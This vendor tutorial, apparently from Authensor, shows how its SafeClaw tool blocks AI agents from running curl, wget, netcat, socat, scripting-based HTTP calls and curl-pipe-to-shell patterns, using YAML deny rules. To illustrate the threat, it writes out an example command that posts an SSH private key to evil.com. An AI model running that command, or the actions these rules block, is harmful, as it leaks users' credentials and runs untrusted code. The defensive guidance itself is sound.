2026-01-12 · Authensor

How to Stop AI Agents from Running curl or wget Commands

SafeClaw by Authensor blocks AI agents from executing curl, wget, and other network transfer commands through deny-by-default action gating. Every shell command is checked against your policy before execution, and network utilities are denied unless you create an explicit exception. Install with npx @authensor/safeclaw and outbound network access via CLI tools is blocked immediately.

Why curl and wget Are Dangerous

curl and wget give an AI agent the ability to download and execute arbitrary code from the internet, send data to external servers (data exfiltration), interact with APIs using your credentials, and fetch malicious payloads. An agent running curl -X POST https://evil.com -d @~/.ssh/id_rsa could exfiltrate your SSH private key in a single command.

Even seemingly innocent uses — like downloading a library or fetching documentation — can be vectors for supply chain attacks or unintended data leakage.

Step 1: Install SafeClaw

npx @authensor/safeclaw

Zero dependencies, MIT licensed. Works with Claude, OpenAI, and all agent frameworks.

Step 2: Block Network Transfer Commands

# safeclaw.policy.yaml
rules:
  - action: shell.execute
    command_pattern: "curl *"
    effect: deny
    reason: "Block curl — prevents data exfiltration and arbitrary downloads"


- action: shell.execute
    command_pattern: "wget *"
    effect: deny
    reason: "Block wget — prevents arbitrary file downloads"



- action: shell.execute
    command_pattern: "fetch *"
    effect: deny
    reason: "Block fetch (BSD systems)"



- action: shell.execute
    command_pattern: "aria2c *"
    effect: deny
    reason: "Block aria2 download manager"



- action: shell.execute
    command_pattern: "httpie *"
    effect: deny
    reason: "Block httpie HTTP client"



- action: shell.execute
    command_pattern: "http *"
    effect: deny
    reason: "Block http command (httpie shorthand)"

Step 3: Block Scripting-Based Network Access

An agent might bypass curl by using built-in scripting tools for network requests:

rules:
  - action: shell.execute
    command_pattern: "python -c urllib*"
    effect: deny
    reason: "Block Python urllib-based network requests"


- action: shell.execute
    command_pattern: "python -c requests*"
    effect: deny
    reason: "Block Python requests-based network requests"



- action: shell.execute
    command_pattern: "node -e fetch"
    effect: deny
    reason: "Block Node.js fetch-based network requests"



- action: shell.execute
    command_pattern: "ruby -e Net::HTTP"
    effect: deny
    reason: "Block Ruby HTTP requests"



- action: shell.execute
    command_pattern: "nc *"
    effect: deny
    reason: "Block netcat connections"



- action: shell.execute
    command_pattern: "ncat *"
    effect: deny
    reason: "Block ncat connections"



- action: shell.execute
    command_pattern: "socat *"
    effect: deny
    reason: "Block socat connections"

Step 4: Block Pipe-to-Shell Patterns

The most dangerous pattern is piping a downloaded script directly into a shell:

rules:
  - action: shell.execute
    command_pattern: "curl * | sh"
    effect: deny
    reason: "Block curl-pipe-to-shell (extreme risk)"


- action: shell.execute
    command_pattern: "curl * | bash"
    effect: deny
    reason: "Block curl-pipe-to-bash"



- action: shell.execute
    command_pattern: "wget * -O - | sh"
    effect: deny
    reason: "Block wget-pipe-to-shell"

These rules are already covered by the blanket curl and wget denies, but listing them explicitly improves audit trail clarity.

Step 5: Allow Specific URLs (Optional)

If your agent needs to fetch data from a trusted API endpoint:

rules:
  - action: shell.execute
    command_pattern: "curl https://api.github.com/repos/*/releases/latest"
    effect: allow
    conditions:
      - human_approval: required
    reason: "Allow checking latest release from GitHub with approval"


# Block all other curl usage
  - action: shell.execute
    command_pattern: "curl *"
    effect: deny
    reason: "Block all other curl commands"

With first-match-wins, the specific GitHub URL is allowed (with human approval) while all other curl usage is denied.

Step 6: Test and Audit

npx @authensor/safeclaw --simulate

Ask your agent to download a file. The log confirms:

[DENIED] shell.execute: "curl https://example.com/file.tar.gz -o /tmp/file.tar.gz"
  Rule: "Block curl — prevents data exfiltration and arbitrary downloads"

Check the hash-chained audit trail:

npx @authensor/safeclaw audit --filter "command_pattern:curl"

SafeClaw is open-source with 446 tests and works with both Claude and OpenAI providers. Every network command attempt is logged in the tamper-proof audit chain.

Related Pages

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw